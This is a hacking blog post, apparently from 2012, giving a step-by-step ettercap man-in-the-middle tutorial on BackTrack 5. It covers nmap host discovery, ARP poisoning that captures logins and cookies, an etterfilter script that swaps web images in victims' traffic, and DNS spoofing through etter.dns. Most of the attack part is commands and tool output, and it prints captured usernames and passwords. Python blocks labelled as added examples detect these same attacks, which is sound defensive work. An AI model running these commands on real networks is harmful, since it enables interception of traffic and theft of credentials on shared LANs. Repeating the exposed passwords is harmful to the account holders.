ettercap on BackTrack 5
Label:
Hacking
This is really just an update of my earlier post, but this time I am using BackTrack 5 and filling in a bit more of ettercap's features. Ettercap is often called the Swiss Army Knife: it is a tool commonly used for the MITM (man in the middle) attack method. There are many variants of MITM attack, such as sniffing, spoofing, phishing, cookie hijacking and plenty more. OK, let me describe my experiment.
1. Attacker: BackTrack 5 R1
   IP address:
   Link encap:Ethernet  HWaddr f4:ec:38:99:60:f3
   inet addr:192.168.1.6  Bcast:192.168.1.255  Mask:255.255.255.0
   inet6 addr: fe80::f6ec:38ff:fe99:60f3/64 Scope:Link
   UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
   RX packets:29319 errors:0 dropped:0 overruns:0 frame:0
   TX packets:30177 errors:0 dropped:0 overruns:0 carrier:0
   collisions:0 txqueuelen:1000
   RX bytes:17469869 (17.4 MB)  TX bytes:6132389 (6.1 MB)
2. Target: Windows XP (installed in VirtualBox)
   IP address: 192.168.1.14
3. Gateway: 192.168.1.1 (TP-Link modem router)
4. Access point: 192.168.1.50 (3Com)
OK, let's begin.
The first step: an attacker will usually enumerate the targets first. This time I use nmap.
zee@eichel{~}:nmap -sn -n 192.168.1.1/24

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-01-06 14:29 WIT
Nmap scan report for 192.168.1.1
Host is up (0.0076s latency).
MAC Address: C8:64:C7:4B:B8:D0 (zte)
Nmap scan report for 192.168.1.6    ===> Attacker
Host is up.
Nmap scan report for 192.168.1.14   ===> Target
Host is up (0.0029s latency).
MAC Address: 08:00:27:45:C0:C0 (Cadmus Computer Systems)
Nmap scan report for 192.168.1.25
Host is up (0.0095s latency).
MAC Address: 1C:4B:D6:44:75:9D (AzureWave)
Nmap scan report for 192.168.1.50
Host is up (0.014s latency).
MAC Address: 00:1E:C1:4C:BF:F6 (3com Europe)
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.35 seconds

Let's look at ettercap's man page. Get into the habit of reading: by reading we learn the details.
ETTERCAP(8)                                                        ETTERCAP(8)

NAME
       ettercap NG-0.7.3 - A multipurpose sniffer/content filter for man in the middle attacks

       ***** IMPORTANT NOTE ******
       Since ettercap NG (formerly 0.7.0), all the options have been changed.
       Even the target specification has been changed. Please read carefully this man page.

SYNOPSIS
       ettercap [OPTIONS] [TARGET1] [TARGET2]

       TARGET is in the form MAC/IPs/PORTs where IPs and PORTs can be ranges
       (e.g. /192.168.0.1-30,40,50/20,22,25)

DESCRIPTION
       Ettercap was born as a sniffer for switched LAN (and obviously even "hubbed" ones), but during the
       development process it has gained more and more features that have changed it to a powerful and
       flexible tool for man-in-the-middle attacks. It supports active and passive dissection of many
       protocols (even ciphered ones) and includes many features for network and host analysis (such as
       OS fingerprint).
       ...

Now what?
PREPARE:
If we want this Swiss Army Knife's attack to work properly against SSL-secured connections, we must make sure the redir_command_on script in etter.conf is enabled. On BackTrack Linux R1 etter.conf is by default in
/etc/etter.conf
To enable that script, open etter.conf with your favourite editor and uncomment the lines below.

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Dumping traffic over ARP (sniffing, dumping HTTPS cookies)
Command: ettercap -T -w dump -i wlan0 -M ARP /xxx.xxx.x.x/ //
Notes:
1. Dump the traffic and sniff it.
2. Syntax: -T = text mode; -w = write to a file, in this example "dump"; -i = the interface to use (default eth0); -M = attack type (MITM).
Output:
zee@eichel{~}:ettercap -T -w dump -i wlan0 -M ARP /192.168.1.1/ //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on wlan0... (Ethernet)

  wlan0 -> F4:EC:38:99:60:F3   192.168.1.6   255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

5 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 192.168.1.1 C8:64:C7:4B:B8:D0

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help

Fri Jan  6 15:04:25 2012
TCP  69.171.224.11:443 --> 192.168.1.14:1116 | SA

HTTP : 69.171.224.11:443 -> USER: teconhackers@yahoo.com  PASS: testes  INFO: http://www.facebook.com/

Fri Jan  6 15:04:25 2012
TCP  192.168.1.14:1116 --> 69.171.224.11:443 | P

POST /login.php?login_attempt=1 HTTP/1.1.
Host: www.facebook.com.
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.
Accept-Language: id,en-us;q=0.7,en;q=0.3.
Accept-Encoding: gzip, deflate.
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7.
Connection: keep-alive.
Referer: http://www.facebook.com/.
Cookie: datr=-JSqTtD5bQG1_TZPO4s_w1F0; lu=RAxSgUQ56_3YJisKv_hVcK2w; lsd=5OOOR; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; wd=855x451; act=1325837039360%2F1%3A2; _e_qGyw_0=%5B%22qGyw%22%2C1325837031899%2C%22act%22%2C1325837031895%2C0%2C%22email%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C648%2C37%2C0%2C838%2C16%5D; _e_qGyw_1=%5B%22qGyw%22%2C1325837039364%2C%22act%22%2C1325837039360%2C1%2C%22pass%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C798%2C39%2C0%2C838%2C16%5D.
Content-Type: application/x-www-form-urlencoded.
Content-Length: 276.
.
charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&lsd=5OOOR&locale=id_ID&email=teconhackers%40yahoo.com&pass=testes&default_persistent=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&lsd=5OOOR&timezone=-270

Fri Jan  6 15:04:31 2012
TCP  69.171.224.11:443 --> 192.168.1.14:1116 | P

HTTP/1.1 200 OK.
Cache-Control: private, no-cache, no-store, must-revalidate.
Expires: Sat, 01 Jan 2000 00:00:00 GMT.
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p".
Pragma: no-cache.
X-Content-Type-Options: nosniff.
X-Frame-Options: DENY.
Set-Cookie: _e_qGyw_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly.
Set-Cookie: _e_qGyw_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly.
Set-Cookie: datr=-JSqTtD5bQG1_TZPO4s_w1F0; expires=Sun, 05-Jan-2014 08:04:30 GMT; path=/; domain=.facebook.com; httponly.
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Flogin_attempt%3D1; path=/; domain=.facebook.com.
Set-Cookie: sfiu=AYiQWdMg0NKJJtjnR5tVGVvbNWEMxoG_LiLa0edz4Cl1Dat4VE5lNttqg66Y1AHmjG6eSmP3y8c8Q3UlogKtkOItnAr5I2uMzVEZJEd1HSvnRpbJDnULxFRjPYmUQdI5e8H4LJ2OdkxMMsOvFBT6UeBM; expires=Sun, 05-Feb-2012 08:04:30 GMT; path=/; domain=.facebook.com; httponly.
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly.
Content-Encoding: gzip.
Content-Type: text/html; charset=utf-8.
X-FB-Server: 10.54.101.46.
X-Cnection: close.
Date: Fri, 06 Jan 2012 08:04:30 GMT.
Content-Length: 6549.
.
[gzip-compressed response body: 6549 bytes of binary data spread over several packets from 15:04:31 to 15:04:33, omitted here]

Fri Jan  6 15:04:33 2012
TCP  69.171.224.11:443 --> 192.168.1.14:1116 | R

Note the output I marked: the user name teconhackers@yahoo.com and password testes, plus the cookies that were dumped.
ARP POISONING + SNIFFING ATTACK METHOD
1. Whole-network attack method
What I mean by a whole-network attack is one aimed at every host behind a single router (gateway).
ettercap -T -q -M ARP // //
Strongly discouraged if the target network is large: it will slow the machines down. Perhaps with high-spec hardware we have the capacity to run this attack method.
Syntax notes: -q = quiet mode (verbose output suppressed).
Syntax combination for an attack on the whole network:
ettercap -T -q -M ARP // //
Output:
zee@eichel{~}:ettercap -T -q -i wlan0 -M ARP // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on wlan0... (Ethernet)

  wlan0 -> F4:EC:38:99:60:F3   192.168.1.6   255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

5 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : ANY (all the hosts in the list)

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help

HTTP : 69.171.228.13:443 -> USER: teconhackers@yahoo.com  PASS: testers  INFO: https://www.facebook.com/
HTTP : 66.163.169.186:443 -> USER: niceday  PASS: 299281  INFO: https://login.yahoo.com/config/login_verify2?&.src=ym

2. Attack method against one specific IP
If the network is too large, it is better to attack a specified target IP. The attack starts with the syntax
ettercap -T -q -F ig.ef -M ARP /xxx.xxx.xxx.xxx/ //
For example, we attack the target IP 192.168.1.14.
Output:
zee@eichel{~}:ettercap -T -q -i wlan0 -M ARP /192.168.1.14/ //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on wlan0... (Ethernet)

  wlan0 -> F4:EC:38:99:60:F3   192.168.1.6   255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

4 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 192.168.1.14 08:00:27:45:C0:C0

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help

HTTP : 72.14.203.84:443 -> USER: zee-eichel@gmail.com  PASS: uufjjeiisjau  INFO: https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/&scc=1&ltmpl=default&ltmplcache=2
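The ARP poisoning in the two runs above leaves an unmistakable trace on the wire: one MAC address (the BackTrack host's) starts answering ARP for the gateway and for the victim at the same time, which is exactly what the "GROUP 1 / GROUP 2" lines describe. The detector below is an added example for this post, not code from the post or from ettercap. It parses ARP replies in the text format tcpdump prints, compares them with a baseline of known-good bindings, and raises an alert on either signature: an IP whose MAC changes, or a single MAC claiming several IPs. The baseline and the sample tcpdump lines are constructed from the addresses in the nmap and ettercap output above.

```python
"""Detect ARP poisoning from a stream of ARP replies.

Added example for this post, not code from the post or from ettercap.
The baseline bindings and the sample tcpdump lines are constructed from the
addresses that appear in the post's nmap and ettercap output.
"""
import re
from collections import defaultdict

# Known-good IP -> MAC bindings, learned while the network was quiet
# (values taken from the nmap host discovery in the post).
BASELINE = {
    "192.168.1.1": "c8:64:c7:4b:b8:d0",   # gateway
    "192.168.1.6": "f4:ec:38:99:60:f3",   # BackTrack host
    "192.168.1.14": "08:00:27:45:c0:c0",  # Windows XP VM
    "192.168.1.50": "00:1e:c1:4c:bf:f6",  # access point
}

# Constructed sample in the style of `tcpdump -n -i wlan0 arp`: two honest
# replies, then the BackTrack host's MAC claiming the gateway and the VM,
# which is what `ettercap -M ARP` sends to both sides.
SAMPLE_TCPDUMP = """\
15:04:20.000001 ARP, Reply 192.168.1.1 is-at c8:64:c7:4b:b8:d0, length 28
15:04:20.000002 ARP, Reply 192.168.1.14 is-at 08:00:27:45:c0:c0, length 28
15:04:25.000003 ARP, Reply 192.168.1.1 is-at f4:ec:38:99:60:f3, length 28
15:04:25.000004 ARP, Reply 192.168.1.14 is-at f4:ec:38:99:60:f3, length 28
15:04:26.000005 ARP, Request who-has 192.168.1.50 tell 192.168.1.6, length 28
15:04:26.000006 ARP, Reply 192.168.1.50 is-at 00:1e:c1:4c:bf:f6, length 28
"""

ARP_REPLY = re.compile(r"ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")


def parse_arp_replies(text):
    """Yield (ip, mac) for every ARP reply line; requests and noise are skipped."""
    for line in text.splitlines():
        m = ARP_REPLY.search(line)
        if m:
            yield m.group(1), m.group(2).lower()


def detect_arp_poisoning(replies, baseline=BASELINE):
    """Return alert strings for two poisoning signatures:
    1. an IP answered by a MAC that differs from its baseline/learned binding;
    2. one MAC answering for more than one IP (reported once per MAC)."""
    bindings = {ip: mac.lower() for ip, mac in baseline.items()}
    ips_by_mac = defaultdict(set)
    for ip, mac in bindings.items():
        ips_by_mac[mac].add(ip)
    alerts, flagged = [], set()
    for ip, mac in replies:
        known = bindings.get(ip)
        if known is None:
            bindings[ip] = mac          # first sighting: learn the host
        elif known != mac:
            alerts.append(f"conflict: {ip} is {known} in baseline, now claimed by {mac}")
        ips_by_mac[mac].add(ip)
        if len(ips_by_mac[mac]) > 1 and mac not in flagged:
            flagged.add(mac)
            alerts.append(f"multi-ip: {mac} answers for {sorted(ips_by_mac[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(parse_arp_replies(SAMPLE_TCPDUMP)):
        print(alert)
```

On a real LAN the baseline would be populated from a quiet period (or from the switch's port/MAC table) and the replies fed from a live capture; the multi-IP rule is the more robust of the two, because a poisoner has to impersonate at least the gateway and one victim to relay traffic.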
Filter (have fun with ettercap)
Heheh, now let's play around with ettercap using particular filters. This time we try the filter coded by Irongeek. Here is the script: copy-paste it, save it as ig.filter, then compile it with etterfilter.

############################################################################
#                                                                          #
#  Jolly Pwned -- ig.filter -- filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                             #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}

if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "http://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-snc7/310716_228831213842949_100001482164189_675549_1767862890_n.jpg\" ");
   replace("IMG SRC=", "http://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-snc7/310716_228831213842949_100001482164189_675549_1767862890_n.jpg\" ");
   msg("Filter Ran.\n");
}

Compiling:
etterfilter [name].filter -o [output].ef

zee@eichel{~}:etterfilter ig.filter -o ig.ef

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA

 12 protocol tables loaded:
        DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

 11 constants loaded:
        VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

 Parsing source file 'ig.filter'  done.

 Unfolding the meta-tree  done.

 Converting labels to real offsets  done.

 Writing output to 'ig.ef'  done.

 -> Script encoded into 16 instructions.

What the filter script does is simply replace every image opened in the victim's browser with the image of your choice. To run ettercap with a particular filter script:
ettercap -T -q -F ig.ef -M ARP // //
If lines like these appear:
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
it means the ARP poisoning is running and images are being swapped for the chosen one, so whenever the poisoned target host or network opens any website in a browser, every image on it will be the replaced one.
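Seen from the web server or a proxy in front of it, the filter above leaves two fingerprints in every request it touches: a header literally named Accept-Rubbish!, and a browser request that carries no Accept-Encoding at all (stripping it is what forces the response into uncompressed HTML so the image replacement can match). The check below is an added example for this post, not code from the post or from ettercap. It parses raw HTTP/1.1 request headers and reports both fingerprints, plus the share of tampered requests in a batch; the sample requests are constructed after the Firefox 7 request captured earlier in the post.

```python
"""Flag HTTP requests that show the header tampering of the ig.filter above.

Added example for this post, not code from the post or from ettercap.
The sample requests are constructed after the Firefox request captured
earlier in the post.
"""

# Constructed: an untouched request and the same request after the filter
# has renamed its Accept-Encoding header.
CLEAN_REQUEST = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)
TAMPERED_REQUEST = CLEAN_REQUEST.replace("Accept-Encoding", "Accept-Rubbish!")


def parse_headers(raw_request):
    """Return {lowercased-name: value} for the header block of a raw request."""
    headers = {}
    for line in raw_request.split("\r\n")[1:]:   # skip the request line
        if line == "":
            break                                 # blank line ends the headers
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def inspect_request(raw_request):
    """Return findings for one request; an empty list means nothing suspicious."""
    headers = parse_headers(raw_request)
    findings = []
    if "accept-rubbish!" in headers:
        findings.append("Accept-Encoding renamed to Accept-Rubbish! (ettercap ig.filter marker)")
    # Every mainstream browser User-Agent starts with "Mozilla/", and every
    # mainstream browser sends Accept-Encoding; its absence is worth noting.
    user_agent = headers.get("user-agent", "").lower()
    if "accept-encoding" not in headers and user_agent.startswith("mozilla/"):
        findings.append("browser request without Accept-Encoding (compression stripped in transit?)")
    return findings


def tampering_ratio(requests):
    """Fraction of requests with at least one finding. A sudden rise above a
    site's normal level is the signal to alert on, not a single request."""
    if not requests:
        return 0.0
    return sum(1 for r in requests if inspect_request(r)) / len(requests)


if __name__ == "__main__":
    for request in (CLEAN_REQUEST, TAMPERED_REQUEST):
        print(inspect_request(request))
    print(tampering_ratio([CLEAN_REQUEST, TAMPERED_REQUEST]))
```

The same marker is trivial to search for in existing access logs if the server logs request headers; the compression-stripping rule is weaker on its own, since some clients and tools legitimately omit Accept-Encoding, which is why the ratio over a window matters more than any one hit.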
Spoofing Plugin
Spoofing is an MITM technique that diverts traffic from its real path to an address chosen by the attacker. In short, the attacker forces the target to an address of the attacker's choosing in place of the real destination. Ettercap has a plugin for this kind of MITM attack.
Run an nmap scan as I showed at the start of this article. Once we have the network information, make sure IP forwarding is enabled on the attacker machine.
To enable IP forwarding:
Linux:
echo 1 > /proc/sys/net/ipv4/ip_forward
BSD:
sysctl -w net.inet.ip.forwarding=1
Then configure the names to be spoofed in the file etter.dns. On BackTrack 5 R1 the default location of etter.dns is
/usr/local/share/ettercap/etter.dns
Uncomment or replace these lines with the domain whose IP you want to spoof.

facebook.com      A   192.168.1.6
*.facebook.com    A   192.168.1.6
www.facebook.com  PTR 192.168.1.6   # Wildcards in PTR are not allowed

Edit the IP address to the replacement address; here I use the address of the BackTrack machine, 192.168.1.6, so facebook.com and www.facebook.com are redirected to 192.168.1.6.
ettercap syntax with the dns_spoof plugin:
ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //
-P = plugin
I tried spoofing gmail.com to 192.168.1.6.
Output:
Ping result on the target host:
Look at the ping result on the target host: the domain www.gmail.com has been redirected (spoofed) to 192.168.1.6. Since I have the Apache web server (localhost) running, when the target host opens gmail.com in its browser it gets my local web page served from 192.168.1.6.
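The ping result described above is also the cheapest thing a defender can check for: a public name such as www.gmail.com being answered with an address on the local LAN, or with an address that disagrees with a resolver reached over a trusted path (a VPN, DNS over TLS, or a known-good recursive server). The checker below is an added example for this post, not code from the post or from ettercap. It parses the first line of Windows and Linux ping output, classifies each name/address pair, and flags both signatures; the trusted baseline and the sample ping lines are constructed, the facebook addresses being the ones seen in the captures earlier in the post.

```python
"""Detect DNS spoofing of public names from the answers a client receives.

Added example for this post, not code from the post or from ettercap.
The baseline and the sample ping lines are constructed for the example.
"""
import ipaddress
import re

# Answers obtained out of band over a trusted path. Constructed here; the
# facebook addresses are the ones that appear in the sniffed sessions above.
TRUSTED_ANSWERS = {
    "www.facebook.com": {"69.171.224.11", "69.171.228.13"},
}

# Names that legitimately resolve to private addresses on this LAN.
INTERNAL_SUFFIXES = (".local", ".lan")

# Constructed first lines of Windows and Linux ping output on the victim,
# plus one echo-reply line that the parser must ignore.
SAMPLE_PING_LINES = [
    "Pinging www.gmail.com [192.168.1.6] with 32 bytes of data:",
    "PING www.facebook.com (69.171.224.11) 56(84) bytes of data.",
    "Pinging printer.local [192.168.1.50] with 32 bytes of data:",
    "Reply from 192.168.1.6: bytes=32 time<1ms TTL=64",
]

# Windows: "Pinging NAME [ADDR] ..."   Linux: "PING NAME (ADDR) ..."
PING_LINE = re.compile(r"^(?:Pinging|PING) (\S+) [\[(](\d+\.\d+\.\d+\.\d+)[\])]")


def parse_ping_line(line):
    """Return (name, address) from the first line of ping output, else None."""
    m = PING_LINE.match(line)
    return (m.group(1), m.group(2)) if m else None


def classify_answer(name, address, trusted=TRUSTED_ANSWERS, internal=INTERNAL_SUFFIXES):
    """Classify one name -> address answer as 'ok' or a suspicious reason."""
    addr = ipaddress.ip_address(address)
    # Signature 1: a public name pointing into RFC 1918 space, as in the post.
    if addr.is_private and not name.endswith(internal):
        return "suspicious: public name resolved to a private address"
    # Signature 2: an answer that differs from what a trusted path returned.
    expected = trusted.get(name)
    if expected is not None and address not in expected:
        return "suspicious: answer disagrees with trusted baseline"
    return "ok"


def audit_ping_output(lines):
    """Classify every ping header line; non-matching lines are ignored."""
    results = []
    for line in lines:
        parsed = parse_ping_line(line)
        if parsed:
            name, address = parsed
            results.append((name, address, classify_answer(name, address)))
    return results


if __name__ == "__main__":
    for row in audit_ping_output(SAMPLE_PING_LINES):
        print(row)
```

The private-address rule catches the exact setup in this post (etter.dns pointing public names at 192.168.1.6) with no baseline at all; the baseline comparison is what catches the more careful variant where the spoofed answer is a public address, and it is only as good as the path the baseline was fetched over.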
OK, I hope this post is useful. I will update this article later; next time I will add how to defend against attacks like these.
Source: Om Zee
Posted by ethical code at 20.03